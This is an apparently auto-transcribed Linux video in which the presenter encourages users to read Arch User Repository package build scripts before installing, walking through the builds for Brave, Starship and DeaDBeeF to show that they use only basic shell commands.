 We often tell Linux users that before they go and grab a script off the internet and run it on their system They actually should open the script the file and actually read it read the source code and see exactly What it's going to do before you run it on your system because you never know that script it could be something malicious It could do something nefarious. It could actually damage your machine So it's always a good idea if you go and grab a script off of somebody's github or their get lab Actually read the script before you execute it not only that but we have scripts that are part of package builds for our Linux distributions For example arch Linux has the a you are the arch user repository and what these are these are community Contributed package builds scripts essentially right and you're actually supposed to read these package builds before you install these programs from the AUR just to be sure that whoever put this thing in the a you are is not trying to do something crazy like Install a crypto miner on your system or something like that, right? So you really are supposed to read those a you are package builds before you install the programs And the same can be said for packstrap on a boon to packstrap is like a a you are for a boon to it has Package builds and those package builds the same thing. It's a script, right? It's an install script. You should read it just to make sure it's not going to do anything damaging to your system Now one of the problems with telling people to go and read these scripts before they run them is that many people They think that they actually can't go and read the script and actually understand it because I get people in my comment section on YouTube They watch my videos and I tell them hey go read this script before just running it on your system And then I get comments like hey DT I can't go read this bash script and understand it I don't know any scripting so it's pointless for me to go and check the source code because I wouldn't know what the hell The source code is doing anyway. I think you guys are underselling yourselves I think many of you guys can actually read these scripts and understand what they're doing Unless you're just a complete brand new day one Linux user Most of you guys can read these scripts because for example these install scripts like these arch package builds Most of these are all they're doing is they're using like some of the basic shell functions And by basic shelf functions I mean copying files moving files removing files things like that making directories the standard shell commands that if you spent a few months On Linux you probably know those commands. You probably run them yourself in the terminal. That's all these scripts are doing So what I was going to do today is if you're a brand new user and you think you can't read some of these AUR package builds or whatever it happens to be I'm actually gonna go to the AUR and I have picked out three programs three very popular programs that are on the AUR And we're actually just gonna read the package builds I'm gonna open the package builds and just show you what the package build is doing And I bet that you can kind of follow along with me and probably figure out exactly what these package builds are doing Yourself without even needing my help. So let me switch over to my browser and Probably the most popular package right now on the AUR I tried to pick very popular programs that most people have probably installed from the AUR and the brave browser Brave dash bin so it's a binary meaning it doesn't have to compile which compiling web browsers takes hours and hours So that's nice that whoever put brave in the AUR actually just installs it as a pre-built binary Now what you want to do if you're installing something from the AUR is you want to view the package build, right? This is essentially a shell script It's an install script and these things are not hard to read and if you're new to reading a bash script or a shell script Let me just scroll down. This is not very long And we don't even need to worry about any of these lines here because those are comments anything that begins with the pound symbol The hashtag right that is just a comment meaning this is not code that's actually gonna get executed This is just comments people leave and usually it's contributors It's just letting you know who actually has worked on this package and usually some contact information as well now because this is not code That's gonna be executed don't even have to worry about that So let's just skip ahead to the rest of the script, right? And then the next section is all of these variables These are variables because they're some name equals some value, right? So package name equals brave dash bin that's gonna be you know later in the script anytime the word package name Happens right here dollar sign package name really that is just a substitute for brave dash bin That's all that is so all of these are just variables So this is not really code that's gonna be executed either although, you know again These words will be substituted for their values later on in the script But really we don't really have to focus too much on that either So let's skip ahead to actually the functions that actually do get executed in the script Which in this case for brave dash bin are just these two down here And you can tell these are shell functions because they're a name Whatever the function name is and then opening and closing parentheses, right? And then you have the opening and closing braces and in between the braces is actually what the function is going to do In this case, this is the prepare function So what is the prepare function going to do the very first thing it's gonna do is gonna run? Make dir make directory dash p brave, right now I don't need to explain this to you if you've been using Linux and you've opened a terminal at least a few times and you know some of the basic bash commands, right? You know what make dir is make directory, right? It's making a directory and it's gonna call it brave So is that a safe command? Yeah, you don't have to worry about it. The next thing is BSD tar now on Linux A lot of us simply use tar rather than the BSD tar, but it doesn't matter. You know what it is It's archive program. So it's extracting something it is extracting this zip file There's a gonna be a source file. So it's going and grabbing package name dash package version So package name dash package version those are variables package name is brave dash bin dash 1.42 point 86 for the package version dot zip and BSD tar is actually going to take that zip file Extract that and get whatever it needs out of that. It's like it's looking for brave And then we're gonna run CH mod plus X now most of you guys know what CH mod plus X is it makes something Executable and in this case, it's making this file here brave slash brave It's making that executable because I guess that is the executable binary for brave So nothing about this prepare command, right? Nothing about that prepare function is dangerous, right? And you're making a directory we're extracting a zip file and we're making something executable now The next function is a little longer. This is the package function now. What is it going to do? Well, first it's going to run the install command. You can think of install. It's similar to the copy command to CP You often see install used in package builds rather than CP So we're gonna run the install command on this directory and we're gonna give it 755 for permission the directory is going to be package dir slash user slash lib and package dir Of course is a variable. There are two variables and arch Linux package builds You need to know about package dir and source dir Just know there are part of when make package actually builds the package for you. It creates these two directories One of them is PKG and one of them is SRC and those are and the variables for these in these scripts is package dir And source dir so if you see those those are just standard stuff You'll see in a ur scripts and we're gonna copy over this file here this brave file We're gonna copy it over to package dir slash user slash lib slash package name, which is brave Then we're gonna do another ch mod So we're gonna change the permissions for this program here And then we're gonna run some more installs the next three lines are all installs again It's essentially a copy a copy and changing the permissions at the same time is kind of what install is So it's gonna move this file to this location Then it's going to move this to this location Then it's gonna move this to this location yada yada yada nothing dangerous about any of that and at the end we have this for loop and For size in 16 by 16 24 by 24 32 by 32 yada yada yada Do this install these logos dot ping to the appropriate Location so basically brave has a bunch of icons in these sizes from 16 by 16 all the way up to 256 by 56 and that is actually part of the names of those icons So depending on the icon name it wants you to put it in the appropriate folder for each Size and that's what that for loop is doing so that's actually pretty clever Otherwise what they could have done instead of the for loop since it's six different icons They could have done six different install commands and just specifically Did one for the 16 by 16 icon one for the 24 by 24 icon yada yada yada But doing the for loop saves a little bit of typing So that is the package built for the brave binary package that's in the a you are and again Just quickly taking a look at it You know all of those commands the only command you probably wouldn't have known If you've never looked at a package build script before you probably have never used the install command, but it's a standard Core utility it's there's nothing weird about that, but you can tell it's not really Installing anything in any weird places and of course, it's not doing any kind of like RM dash RF You know it's not doing like a forced Remove which can be dangerous if it if a package build is removing files and directories because if somebody didn't know what they Were doing and did a RM RF on the wrong directory For example like a home directory or something like that right it would be very damaging to the system But in this case, yeah, there's nothing wrong with the brave been package build Well, I picked out a couple of others because I had wanted a good cross section because some of these may be a little bit More complicated than others I found the Starship prompt the Starship prompt is a shell prompt that works in bash ZSH and fish It's a very popular program. It's in the AUR. Let's read the package build and now that I've kind of talked to you through it Again, we don't worry about the comments and I'm not really worried about these variables at the top Although you can read it some of them are useful for example the source here The source variable tells you exactly where it's pulling the source code from so you may want to go to that GitHub and actually check out the source code on the GitHub if you really want to but really we're worried about the Functions, you know, what is actually getting executed here? I'm not going to talk to you through this the package ver function here It's doing a CD into a folder and then it's echoing something which is just printing out something to the terminal not dangerous We don't even have to worry about it in the build function We're in a CD into a directory no big deal, right? Then we're going to run cargo build So this is a Rust program and we're going to build it from source using cargo Which is the rust package manager essentially nothing weird about that the check function again We're going to CD into a directory and then we're going to do a cargo test on it No big deal about any of that and then the package function We're going to CD into the source directory slash package name and then we're going to install some files and directories You know put them in their appropriate places pretty easy package build now that you've seen one You've kind of seen them all for one last package build. This is the dead beef music player My favorite music player. Let's read the package build and see what it does again We're not worried about the comments and we're really not worried about these Variables at the top although if you wanted to know exactly where it's pulling the source code from there is the source variable What we're really interested of course is the functions at the bottom here, so we have the build function here What is it doing? Well, it's doing a CD into a directory and then it's exporting some variables for CC and CXX so typically when you see this this is a C program or maybe a C++ program and it's about to Compile it from source and if you've ever compiled a C program typically it involves three commands Dot slash configure then make and then make install and that's exactly what it's about to go on here We have dot slash configure Then the make command and in the package function, which is the next function that gets executed We have a CD command, but the next thing is the make install So that is all that's going on here We're doing a configure make make install and then we have the install command here that copies this file over to this Target directory and and that's it very easy to figure out what these package builds are and you don't have to be a Rocket scientist to figure this out right? Anyone could figure this out if you've done some basic stuff at the shill if you occasionally open up a terminal and do a Lesson CD maybe you make a directory with make dir or you move with MV or CP for copy or RM to remove files You know just the very basic shill commands That's 90% of what goes on especially in these build scripts and these install scripts on Linux now having said all that Do I actually read these package builds every time I install something from the AUR? I will tell you nine times out of ten I don't because I don't install a ton of stuff from the AUR most of the stuff I install from the AUR are really popular programs like brave Starship dead beef those are three programs. I actually have installed on all of my systems and they're in the AUR I knew they were in the AUR Which is why I picked those package builds to take a look at today But I never read those because I know those programs are very popular those package builds in the AUR They get installed all the time a lot of people are installing them and if there was something wrong with them Somebody would spot it immediately Especially brave I brave is probably the most popular package right now on the AUR to probably eventually make its way to the arch core repository for me typically I read package builds for really small niche programs that not a lot of people have heard of because I Might be the only person that's ever actually installed that program from the AUR And who knows if nobody else has tried it before me it could be something nefarious something scandalous Right, so I might actually want to read that package build The other times that I read package builds is when you're building stuff from the AUR sometimes They don't compile correctly sometimes. They just don't build correctly It'll throw errors and then typically what I'll do is I'll go into the package build and see if I can spot any kind Of error and a lot of times I can actually correct the package build I can find the mistake what's throwing the error and I can modify the package build to where it actually then builds correctly for me I've actually done that several times in the past so it is a good idea to get in the habit of reading these things and Obviously not only just reading these things for safety reasons But also just to to learn a little more especially about some of the basic shell commands and before I go I need to thank the producers of this episode and of course I'm talking about Dustin Gabe James Matt Maxim Mimit Michael Mitchell Paul West Why you ball told me Alan armored dragon Chuck commander angry dieokai Dylan Greg Marsstrom Erion Alexander Paul piece arching for door polytech reality It's for less Red Prophet Steven tools Devler and Willie these guys. They're my highest tier patrons over on patreon without these guys This episode would not have been possible The show is also brought to you by each and every one of these fine ladies and gentlemen all these names you're seeing on the Screen right now. These are all my supporters over on patreon because I don't have any corporate sponsors I'm sponsored by you guys the community if you want to see more videos about Linux free and open source software Subscribe to distro tube over on patreon. All right guys. Peace. I Bet most a you are users have never read a package build